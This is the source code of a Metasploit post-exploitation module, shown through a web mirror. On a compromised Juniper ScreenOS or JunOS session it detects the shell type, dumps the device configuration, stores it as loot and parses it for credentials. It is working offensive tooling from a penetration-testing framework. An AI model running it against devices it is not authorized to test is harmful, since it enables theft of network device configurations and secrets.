Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/networking/gather/enum_juniper.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Auxiliary::Juniper

8
  include Msf::Exploit::Deprecated

9
  moved_from 'post/juniper/gather/enum_juniper'

10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Juniper Gather Device General Information',

15
        'Description' => %q{

16
          This module collects a Juniper ScreenOS and JunOS device information and configuration.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'h00die'],

20
        'Platform' => [ 'juniper'],

21
        'SessionTypes' => [ 'shell' ],

22
        'Notes' => {

23
          'Stability' => [CRASH_SAFE],

24
          'SideEffects' => [IOC_IN_LOGS],

25
          'Reliability' => []

26
        }

27
      )

28
    )

29
  end

30


31
  def run

32
    # Get device prompt

33
    prompt = session.shell_command('')

34


35
    os_type = 'junos'

36
    command_prefix = ''

37
    if prompt.end_with?('% ') # we're in an SSH shell

38
      vprint_status('In an SSH shell')

39
      command_prefix = 'cli '

40
    elsif prompt.end_with?('-> ') # hit cli of ScreenOS, change the os_type

41
      os_type = 'screenos'

42
    elsif prompt.end_with?('> ') # cli of JunOS

43
      vprint_status('In a cli shell')

44
    elsif prompt.end_with?('# ') # we're in a cli>configure

45
      vprint_status('In a cli>configure shell')

46
      session.shell_command('quit') # gets us back to the cli non-config

47
    elsif session.shell_command('?') =~ /\?: No match\./ # confirmed ssh shell

48
      vprint_status('In an SSH shell')

49
      command_prefix = 'cli '

50
    end

51


52
    if os_type == 'screenos'

53
      # Set terminal length to 0 so no paging is required

54
      session.shell_write("term len 0 \n")

55
    end

56


57
    # Get version info

58
    print_status('Getting version information')

59
    get_system_cmd = os_type.eql?('screenos') ? 'get system' : 'show configuration'

60
    get_system_cmd = command_prefix + get_system_cmd

61
    system_out = session.shell_command(get_system_cmd)

62
    # https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L2

63
    # https://kb.juniper.net/InfoCenter/index?page=content&id=KB6489

64
    if /^Product Name: (?<ver>SSG|NetScreen)/i =~ system_out

65
      vprint_status("Original OS Guess #{os_type}, is now ScreenOS #{ver}")

66
      os_type = 'screenos'

67
    elsif /^Product Name: (?<ver>.+)/i =~ system_out

68
      vprint_status("Original OS Guess #{os_type}, is now JunOS #{ver}")

69
      os_type = 'junos'

70
    elsif /^version (?<ver>[.\dR]+);/i =~ system_out

71
      vprint_status("Original OS Guess #{os_type}, is now JunOS #{ver}")

72
      os_type = 'junos'

73
    end

74


75
    print_status("The device OS is #{os_type}")

76


77
    case os_type

78
    when /screenos/

79
      ver_loc = store_loot('juniper.screenos.config',

80
                           'text/plain',

81
                           session,

82
                           system_out.strip,

83
                           'config.txt',

84
                           'Juniper ScreenOS Config')

85
    when /junos/

86
      ver_loc = store_loot('juniper.junos.config',

87
                           'text/plain',

88
                           session,

89
                           system_out.strip,

90
                           'config.txt',

91
                           'Juniper JunOS Config')

92
    end

93


94
    # Print the version of VERBOSE set to true.

95
    vprint_good("Config information stored in to loot #{ver_loc}")

96


97
    # run additional information gathering

98
    enum_configs(prompt, os_type, command_prefix)

99
  end

100


101
  # run commands found in exec mode under privilege 1

102
  def enum_configs(prompt, os_type, command_prefix)

103
    host = session.session_host

104
    port = session.session_port

105
    exec_commands = [

106
      {

107
        'cmd' => { 'junos' => 'show configuration', 'screenos' => 'get config' },

108
        'fn' => 'get_config',

109
        'desc' => 'Get Device Config on Juniper Device'

110
      },

111
    ]

112
    exec_commands.each do |ec|

113
      command = command_prefix + ec['cmd'][os_type]

114
      cmd_out = session.shell_command(command).gsub(/#{command}|#{prompt}/, '')

115
      next if cmd_out =~ /unknown keyword/ # screenOS

116


117
      print_status("Gathering info from #{command}")

118
      cmd_loc = store_loot("juniper.#{ec['fn']}",

119
                           'text/plain',

120
                           session,

121
                           cmd_out.strip,

122
                           "#{ec['fn']}.txt",

123
                           ec['desc'])

124
      vprint_good("Saving to #{cmd_loc}")

125
      if os_type == 'screenos'

126
        juniper_screenos_config_eater(host, port, cmd_out.strip)

127
      elsif os_type == 'junos'

128
        juniper_junos_config_eater(host, port, cmd_out.strip)

129
      end

130
    end

131
  end

132
end

133


134